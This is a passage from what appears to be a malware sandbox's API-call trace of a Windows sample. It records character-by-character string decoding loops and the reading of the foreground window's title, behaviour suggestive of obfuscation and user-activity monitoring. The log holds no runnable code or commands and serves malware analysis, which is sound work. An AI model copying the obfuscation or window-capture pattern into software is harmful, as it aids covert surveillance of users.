out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.485] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0178.486] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.486] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0178.487] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.488] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0178.488] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.489] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.490] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.490] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.491] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.491] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.492] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.493] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.493] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.494] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.494] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.495] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.495] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.500] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.500] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.501] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.501] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.502] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.502] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.503] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.504] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.504] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.505] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.505] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.506] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.507] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.507] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.508] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.508] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.509] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.509] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.510] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.511] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.518] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.518] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.519] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.519] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.520] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.521] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.521] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.522] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.522] GetForegroundWindow () returned 0x20086 [0178.522] GetLastError () returned 0x0 [0178.523] SysStringLen (param_1=" ") returned 0xff [0178.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.523] SysStringLen (param_1=" ") returned 0xff [0178.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.523] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0178.523] GetLastError () returned 0x0 [0178.524] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.524] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0178.524] SysStringLen (param_1="Progr") returned 0x5 [0178.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Progr", cchWideChar=6, lpMultiByteStr=0x1150ca4, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Progr", lpUsedDefaultChar=0x0) returned 6 [0178.525] SetWindowTextA (hWnd=0x103c4, lpString="Progr") returned 1 [0178.525] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0178.525] GetFocus () returned 0x0 [0178.525] lstrlenA (lpString="Progr") returned 5 [0178.525] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0178.526] IsWindow (hWnd=0x103c4) returned 1 [0178.526] IsWindow (hWnd=0x103c4) returned 1 [0178.526] IsWindow (hWnd=0x103c4) returned 1 [0178.530] IsWindow (hWnd=0x103c4) returned 1 [0178.531] GetFocus () returned 0x0 [0178.531] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0178.531] GetFocus () returned 0x0 [0178.531] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0178.532] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0178.532] GetFocus () returned 0x0 [0178.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0178.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Progr", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=6 | out: lpWideCharStr="Progr") returned 6 [0178.532] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.532] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0178.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.534] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0178.534] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.535] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0178.535] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.536] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0178.537] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.538] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.538] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.539] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.539] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.540] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.540] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.541] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.542] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.547] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.547] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.548] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: 